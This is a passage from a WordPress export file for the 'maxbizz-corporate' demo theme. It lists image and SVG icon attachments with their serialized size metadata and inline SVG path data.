		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image2-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:736;s:6:"height";i:500;s:4:"file";s:24:"2020/11/image2-home4.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home4-300x204.jpg";s:5:"width";i:300;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home4-600x500.jpg";s:5:"width";i:600;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/bg1-home4/</link>
		<pubDate>Wed, 11 Nov 2020 04:48:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1849</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 04:48:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 04:48:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bg1-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:800;s:4:"file";s:21:"2020/11/bg1-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home4-300x125.jpg";s:5:"width";i:300;s:6:"height";i:125;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home4-1024x427.jpg";s:5:"width";i:1024;s:6:"height";i:427;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home4-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home4-1536x640.jpg";s:5:"width";i:1536;s:6:"height";i:640;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home4-1200x800.jpg";s:5:"width";i:1200;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>certificate</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/certificate/</link>
		<pubDate>Wed, 11 Nov 2020 07:10:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/certificate.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1867</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:10:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:10:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[certificate]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/certificate.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/certificate.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 470 470"><g><path d="m429.591,418.378l-62.223-150.218c-1.585-3.826-5.972-5.645-9.799-4.059s-5.645,5.973-4.059,9.799l56.251,135.801-51.309-14.867c-3.368-0.977-6.965,0.513-8.656,3.586l-25.769,46.793-60.357-145.716c69.663-13.434 122.447-74.853 122.447-148.378 0.001-83.327-67.79-151.119-151.117-151.119s-151.119,67.792-151.119,151.119c0,33.751 11.124,64.951 29.896,90.133l-73.368,177.126c-1.103,2.664-0.582,5.724 1.341,7.872 1.922,2.148 4.907,3.004 7.676,2.202l60.533-17.541 30.4,55.207c1.324,2.403 3.847,3.882 6.568,3.882 0.138,0 0.277-0.004 0.416-0.011 2.879-0.16 5.411-1.955 6.515-4.619l58.136-140.353c1.585-3.827-0.232-8.214-4.059-9.799-3.827-1.585-8.214,0.232-9.799,4.059l-52.165,125.936-25.767-46.793c-1.692-3.073-5.291-4.563-8.657-3.586l-51.308,14.867 64.397-155.469c27.598,29.52 66.86,48.005 110.364,48.005 4.491,0 8.933-0.209 13.325-0.594l67.818,163.727c1.103,2.664 3.636,4.459 6.514,4.618 0.14,0.008 0.278,0.012 0.417,0.012 2.721,0 5.244-1.479 6.567-3.882l30.401-55.207 60.533,17.541c2.771,0.803 5.753-0.054 7.676-2.202 1.923-2.148 2.443-5.208 1.34-7.872zm-330.71-267.259c2.84217e-14-75.056 61.063-136.119 136.119-136.119 75.056,0 136.118,61.063 136.118,136.119s-61.062,136.118-136.118,136.118c-75.056,0-136.119-61.062-136.119-136.118z"></path><path d="m321.659,122.961c-0.863-2.658-3.135-4.616-5.892-5.079l-50.467-8.469-23.649-45.379c-1.292-2.479-3.855-4.034-6.651-4.034-2.795,0-5.359,1.555-6.651,4.034l-23.65,45.379-50.466,8.469c-2.757,0.462-5.028,2.42-5.892,5.079-0.864,2.659-0.178,5.577 1.781,7.572l35.85,36.515-7.54,50.614c-0.412,2.765 0.748,5.529 3.01,7.173 2.26,1.642 5.249,1.891 7.751,0.646l45.807-22.812 45.806,22.812c1.059,0.527 2.203,0.787 3.343,0.787 1.557,0 3.104-0.484 4.409-1.432 2.262-1.644 3.422-4.408 3.01-7.173l-7.539-50.614 35.85-36.516c1.958-1.995 2.644-4.913 1.78-7.572zm-50.951,36.244c-1.648,1.679-2.413,4.033-2.066,6.359l5.97,40.074-36.268-18.061c-1.054-0.524-2.198-0.787-3.344-0.787-1.145,0-2.291,0.262-3.343,0.787l-36.268,18.061 5.97-40.074c0.347-2.326-0.418-4.681-2.066-6.359l-28.385-28.912 39.957-6.706c2.32-0.389 4.323-1.844 5.41-3.93l18.725-35.929 18.725,35.93c1.088,2.086 3.09,3.541 5.41,3.93l39.958,6.706-28.385,28.911z"></path><path d="m348.612,158.684c-4.107-0.549-7.877,2.343-8.42,6.45-6.957,52.507-52.18,92.104-105.192,92.104-58.514,0-106.119-47.604-106.119-106.119s47.605-106.119 106.119-106.119c53.013,0 98.235,39.596 105.192,92.104 0.543,4.107 4.32,7.001 8.42,6.45 4.105-0.544 6.994-4.314 6.449-8.42-7.94-59.936-59.555-105.134-120.061-105.134-66.785,0-121.119,54.333-121.119,121.119s54.334,121.118 121.119,121.118c60.506,0 112.121-45.198 120.062-105.134 0.544-4.105-2.344-7.875-6.45-8.419z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>files</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/files/</link>
		<pubDate>Wed, 11 Nov 2020 07:13:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/files.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1869</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:13:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:13:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[files]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/files.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/files.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M260.981,445.576H65.171c-12.354,0-22.405-10.051-22.405-22.405V91.202c0-4.143-3.357-7.5-7.5-7.5s-7.5,3.357-7.5,7.5   v331.969c0,20.625,16.78,37.405,37.405,37.405h195.81c4.143,0,7.5-3.357,7.5-7.5S265.124,445.576,260.981,445.576z"></path>
	<path d="M35.266,68.701c4.143,0,7.5-3.357,7.5-7.5V37.405C42.766,25.051,52.817,15,65.171,15h283.655   c12.354,0,22.405,10.051,22.405,22.405v121.67c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5V37.405   C386.232,16.78,369.452,0,348.827,0H65.171C44.546,0,27.766,16.78,27.766,37.405v23.796C27.766,65.344,31.124,68.701,35.266,68.701   z"></path>
	<path d="M301.033,102.805c12.924,0,23.438-10.515,23.438-23.438s-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,5.101,1.643,9.823,4.421,13.675l-36.844,51.487c-2.162-0.66-4.454-1.017-6.828-1.017c-5.982,0-11.444,2.255-15.59,5.957   l-24.089-13.669c0.278-1.44,0.428-2.925,0.428-4.444c0-12.924-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,1.52,0.15,3.004,0.428,4.444l-24.089,13.669c-4.146-3.701-9.609-5.956-15.59-5.956c-12.924,0-23.438,10.514-23.438,23.438   s10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-1.52-0.15-3.004-0.428-4.444l24.089-13.669   c4.146,3.701,9.609,5.956,15.59,5.956c5.981,0,11.444-2.255,15.59-5.956l24.089,13.669c-0.278,1.44-0.428,2.924-0.428,4.444   c0,12.924,10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-5.102-1.644-9.824-4.422-13.677l36.843-51.485   C296.365,102.447,298.657,102.805,301.033,102.805z M112.965,175.386c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438   c4.653,0,8.438,3.785,8.438,8.438S117.619,175.386,112.965,175.386z M175.655,139.791c-4.653,0-8.438-3.785-8.438-8.438   s3.785-8.438,8.438-8.438c4.652,0,8.438,3.785,8.438,8.438S180.307,139.791,175.655,139.791z M238.343,175.386   c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438c4.653,0,8.438,3.785,8.438,8.438S242.997,175.386,238.343,175.386z    M301.033,70.929c4.652,0,8.438,3.785,8.438,8.438c0,4.653-3.785,8.438-8.438,8.438c-4.653,0-8.438-3.785-8.438-8.438   C292.594,74.714,296.379,70.929,301.033,70.929z"></path>
	<path d="M275.355,285.43H89.279c-4.143,0-7.5,3.357-7.5,7.5s3.357,7.5,7.5,7.5h186.076c4.143,0,7.5-3.357,7.5-7.5   S279.498,285.43,275.355,285.43z"></path>
	<path d="M81.779,378.157c0,4.143,3.357,7.5,7.5,7.5h202.743c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5H89.279   C85.136,370.657,81.779,374.015,81.779,378.157z"></path>
	<path d="M430.511,325.202c14.881-10.362,26.219-24.74,32.788-41.58c0.119-0.305,0.214-0.616,0.292-0.929   c3.833-10.075,5.909-20.904,5.909-32.037v-15.287h7.234c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H280.729   c-4.143,0-7.5,3.357-7.5,7.5v38.796c0,4.143,3.357,7.5,7.5,7.5h7.234v15.287c0,11.133,2.076,21.962,5.909,32.037   c0.077,0.313,0.172,0.624,0.292,0.929c6.569,16.84,17.907,31.218,32.788,41.58c4.754,3.311,9.768,6.134,14.981,8.452v26.281   c-32.488,14.441-53.97,47.146-53.97,82.98v15.288h-7.234c-4.143,0-7.5,3.357-7.5,7.5V504.5c0,4.143,3.357,7.5,7.5,7.5h196.005   c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H469.5v-15.288c0-15.772-4.111-31.31-11.891-44.933   c-2.054-3.597-6.635-4.847-10.231-2.794c-3.598,2.054-4.849,6.635-2.794,10.231c6.487,11.361,9.916,24.327,9.916,37.495v15.287   h-17.747l-31.201-37.851c-6.508-7.896-16.109-12.451-26.342-12.499c-0.055,0-0.106,0-0.161,0c-10.172,0-19.749,4.461-26.295,12.254   l-32.001,38.096h-17.789v-15.287c0-31.381,19.735-59.886,49.109-70.932c2.924-1.1,4.86-3.896,4.86-7.021v-26.187   c4.675,1.152,9.451,1.938,14.299,2.333v18.77c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-18.77   c4.847-0.396,9.623-1.182,14.298-2.333v26.187c0,3.124,1.937,5.92,4.86,7.02c7.89,2.968,15.194,7.215,21.71,12.623   c3.187,2.646,7.916,2.207,10.561-0.98c2.646-3.187,2.207-7.915-0.98-10.561c-6.448-5.354-13.544-9.757-21.15-13.132v-26.279   C420.744,331.336,425.757,328.513,430.511,325.202z M364.24,429.755c3.688-4.39,9.08-6.901,14.81-6.901c0.03,0,0.061,0,0.091,0   c5.763,0.026,11.171,2.593,14.837,7.04l23.336,28.31h-76.971L364.24,429.755z M469.234,473.204V497H288.229v-23.796H469.234z    M288.229,220.369v-23.796h181.005v23.796H462H295.463H288.229z M405.39,321.588c-0.194,0.073-0.372,0.172-0.557,0.26   c-8.184,2.976-16.983,4.577-26.101,4.577c-9.119,0-17.92-1.602-26.105-4.578c-0.184-0.087-0.361-0.186-0.554-0.259   c-16.736-6.293-30.335-18.26-38.946-33.191h21.454c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5h-28.083   c-2.303-7.25-3.534-14.905-3.534-22.74v-15.287H454.5v15.287c0,7.835-1.231,15.491-3.534,22.74H364.58c-4.143,0-7.5,3.357-7.5,7.5   s3.357,7.5,7.5,7.5h79.757C435.726,303.328,422.126,315.294,405.39,321.588z"></path>
	<path d="M378.732,378.377c-4.143,0-7.5,3.357-7.5,7.5v3.478c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-3.478   C386.232,381.734,382.875,378.377,378.732,378.377z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>networking</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/networking/</link>
		<pubDate>Wed, 11 Nov 2020 07:15:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/networking.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1870</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:15:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:15:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[networking]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/networking.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/networking.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M337.392,377.361c-3.438,2.311-4.352,6.971-2.041,10.408c1.447,2.154,3.817,3.317,6.231,3.317   c1.438,0,2.894-0.414,4.177-1.276c16.269-10.935,30.137-24.531,41.213-39.984c0.12-0.155,0.237-0.313,0.345-0.477   c19.123-26.889,29.79-59.369,29.79-93.349c0-34.475-10.889-66.451-29.401-92.682c-0.337-0.65-0.765-1.244-1.269-1.765   c-29.308-40.366-76.859-66.669-130.446-66.669c-23.574,0-46.297,4.979-67.537,14.798c-3.76,1.738-5.398,6.195-3.66,9.955   c1.737,3.759,6.194,5.399,9.955,3.66c9.401-4.346,19.125-7.638,29.104-9.877c-6.338,7.999-12.09,18.475-17.049,31.242   c-1.8,4.635-3.459,9.528-5.004,14.602h-55.278c6.863-7.762,14.532-14.819,22.869-20.963c3.334-2.458,4.045-7.153,1.588-10.487   c-2.458-3.334-7.153-4.044-10.487-1.588c-13.521,9.966-25.468,22.09-35.293,35.709c-0.237,0.281-0.449,0.582-0.643,0.896   c-4.379,6.158-8.331,12.614-11.792,19.313c-11.704,22.652-17.89,48.192-17.89,73.858c0,34.476,10.89,66.453,29.403,92.684   c0.336,0.648,0.763,1.24,1.266,1.76c29.308,40.368,76.86,66.672,130.448,66.672c21.485,0,42.351-4.162,62.017-12.371   c3.823-1.596,5.628-5.988,4.032-9.811c-1.595-3.822-5.99-5.626-9.81-4.032c-7.837,3.271-15.886,5.832-24.102,7.677   c6.338-7.999,12.089-18.475,17.048-31.24c1.801-4.635,3.46-9.528,5.005-14.602h55.316   C357.316,361.992,347.91,370.292,337.392,377.361z M365.396,159.263h-30.918c-4.143,0-7.5,3.358-7.5,7.5s3.357,7.5,7.5,7.5h42.572   c14.497,21.403,23.475,46.836,24.867,74.237h-78.825c-0.715-39.135-7.01-75.766-17.916-103.839   c-4.951-12.745-10.692-23.208-17.018-31.202C318.567,120.318,345.411,136.686,365.396,159.263z M203.888,263.5h104.203   c-0.528,28.173-4.011,53.335-9.326,74.237h-85.586C207.61,315.734,204.393,290.293,203.888,263.5z M203.89,248.5   c0.528-28.173,4.011-53.335,9.326-74.237h85.586c5.569,22.003,8.786,47.444,9.291,74.237H203.89z M255.991,109.883   c12.446,0,25.277,14.656,35.204,40.209c1.145,2.948,2.224,6.023,3.26,9.17h-76.878   C227.822,128.263,242.336,109.883,255.991,109.883z M126.09,189.027c2.628-5.086,5.568-10.016,8.784-14.765h62.867   c-5.312,22.341-8.368,47.708-8.852,74.237h-78.817C111.109,227.612,116.475,207.637,126.09,189.027z M146.584,352.737h30.074   c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-41.727c-14.498-21.403-23.475-46.836-24.867-74.237h78.825   c0.715,39.135,7.01,75.766,17.915,103.839c4.951,12.745,10.692,23.208,17.018,31.202   C193.413,391.682,166.57,375.314,146.584,352.737z M255.991,402.117c-12.446,0-25.278-14.656-35.204-40.209   c-1.145-2.948-2.224-6.023-3.26-9.17h76.878C284.159,383.737,269.645,402.117,255.991,402.117z M314.24,337.737   c5.312-22.341,8.368-47.709,8.852-74.237h78.807c-1.373,26.87-10.084,52.455-24.791,74.237H314.24z"></path>
	<path d="M414.428,113.042L300.576,47.313c-3.589-2.072-8.175-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.852,65.729c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C419.244,119.7,418.015,115.113,414.428,113.042z"></path>
	<path d="M67.967,321.706V190.294c0-4.142-3.358-7.5-7.5-7.5s-7.5,3.358-7.5,7.5v131.412c0,4.142,3.358,7.5,7.5,7.5   S67.967,325.848,67.967,321.706z"></path>
	<path d="M406.905,385.979l-113.828,65.718c-3.587,2.071-4.816,6.658-2.745,10.245c1.389,2.406,3.91,3.751,6.502,3.751   c1.272,0,2.563-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   C415.079,385.137,410.491,383.907,406.905,385.979z"></path>
	<path d="M444.014,190.294v131.412c0,4.142,3.357,7.5,7.5,7.5s7.5-3.358,7.5-7.5V190.294c0-4.142-3.357-7.5-7.5-7.5   S444.014,186.152,444.014,190.294z"></path>
	<path d="M218.904,451.697l-113.851-65.729c-3.587-2.072-8.174-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.851,65.729c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C223.72,458.354,222.491,453.768,218.904,451.697z"></path>
	<path d="M101.333,127.027c1.272,0,2.562-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   c-2.072-3.587-6.658-4.816-10.245-2.745L97.576,113.031c-3.587,2.071-4.816,6.658-2.745,10.245   C96.22,125.682,98.741,127.027,101.333,127.027z"></path>
	<path d="M255.991,60.46c16.669,0,30.23-13.561,30.23-30.23S272.659,0,255.991,0s-30.23,13.562-30.23,30.23   S239.322,60.46,255.991,60.46z M255.991,15c8.398,0,15.23,6.833,15.23,15.23s-6.832,15.23-15.23,15.23   c-8.398,0-15.23-6.832-15.23-15.23S247.593,15,255.991,15z"></path>
	<path d="M75.583,116.935C61.149,108.6,42.623,113.564,34.288,128c-8.334,14.436-3.371,32.961,11.065,41.295   c4.749,2.742,9.938,4.044,15.064,4.044c10.455,0,20.638-5.422,26.231-15.109C94.983,143.794,90.019,125.27,75.583,116.935z    M73.658,150.73c-4.2,7.272-13.532,9.773-20.805,5.575c-7.272-4.199-9.773-13.532-5.575-20.805   c2.034-3.523,5.318-6.043,9.248-7.096s8.034-0.513,11.557,1.521C75.356,134.125,77.857,143.458,73.658,150.73z"></path>
	<path d="M45.353,342.705C30.917,351.039,25.953,369.564,34.288,384c5.593,9.688,15.775,15.109,26.231,15.109   c5.125,0,10.316-1.303,15.064-4.044c14.436-8.334,19.399-26.859,11.065-41.295C78.313,339.333,59.787,334.371,45.353,342.705z    M68.083,382.075c-3.523,2.034-7.629,2.574-11.557,1.521c-3.93-1.053-7.214-3.573-9.248-7.096   c-4.199-7.273-1.698-16.606,5.575-20.805c7.273-4.2,16.605-1.698,20.805,5.575C77.857,368.542,75.356,377.875,68.083,382.075z"></path>
	<path d="M255.991,451.54c-16.669,0-30.23,13.561-30.23,30.23S239.322,512,255.991,512s30.23-13.562,30.23-30.23   S272.659,451.54,255.991,451.54z M255.991,497c-8.398,0-15.23-6.833-15.23-15.23s6.833-15.23,15.23-15.23   c8.398,0,15.23,6.832,15.23,15.23S264.389,497,255.991,497z"></path>
	<path d="M466.628,342.705c-14.435-8.333-32.96-3.371-41.296,11.065c-8.334,14.436-3.37,32.961,11.065,41.295   c4.658,2.689,9.827,4.063,15.066,4.063c2.625,0,5.27-0.345,7.873-1.043c7.8-2.09,14.318-7.092,18.355-14.084   c4.038-6.993,5.11-15.14,3.021-22.94C478.623,353.261,473.621,346.742,466.628,342.705z M464.702,376.5L464.702,376.5   c-2.034,3.523-5.318,6.044-9.248,7.097c-3.929,1.053-8.034,0.513-11.557-1.521c-7.272-4.199-9.773-13.532-5.575-20.805   c2.818-4.881,7.948-7.612,13.216-7.612c2.582,0,5.197,0.656,7.59,2.037c3.522,2.034,6.043,5.318,7.096,9.248   S466.737,372.977,464.702,376.5z"></path>
	<path d="M451.564,173.339c5.125,0,10.316-1.303,15.064-4.044c6.993-4.038,11.995-10.557,14.085-18.356   c2.09-7.8,1.018-15.947-3.021-22.94v0c-4.037-6.993-10.556-11.995-18.355-14.085c-7.8-2.089-15.946-1.018-22.939,3.02   c-14.436,8.334-19.399,26.859-11.065,41.296C430.926,167.918,441.108,173.34,451.564,173.339z M443.898,129.925   c2.347-1.355,4.951-2.047,7.591-2.047c1.322,0,2.654,0.174,3.966,0.525c3.93,1.053,7.214,3.573,9.248,7.096v0   c2.034,3.522,2.574,7.627,1.521,11.557s-3.573,7.214-7.096,9.248c-7.271,4.199-16.604,1.698-20.806-5.574   C434.124,143.458,436.625,134.124,443.898,129.925z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/strategy/</link>
		<pubDate>Wed, 11 Nov 2020 07:16:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/strategy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1871</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:16:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:16:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[strategy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
